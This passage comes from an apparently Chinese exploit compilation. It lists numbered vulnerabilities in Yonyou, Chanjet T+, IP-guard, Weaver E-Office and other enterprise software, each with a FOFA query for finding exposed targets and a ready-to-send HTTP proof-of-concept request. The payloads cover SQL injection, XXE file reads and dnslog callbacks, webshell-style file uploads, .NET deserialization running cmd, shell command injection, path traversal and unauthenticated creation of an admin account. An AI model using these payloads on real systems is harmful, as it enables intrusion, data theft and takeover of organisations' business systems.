User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:2227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"

GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is the base64 of "select 1,user(),3"; the export handler runs whatever statement it decodes and returns the result as a spreadsheet.

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The raw request body is written to a file named by the filename parameter, extension included.

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter is spliced into a shell command by the bundled FlexPaper view.php; "||" runs the injected echo. Then fetch the marker file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

The path value is used unchecked; ..%2Fconfig.ini pulls config.ini from one directory above the download root.

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based: the sId value is concatenated into the query, and a vulnerable server answers roughly five seconds late.

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"

POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 180

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

A 200 response means the unauthenticated addOperators call created the operator account test123456 / 123456 (operatorRole=00).

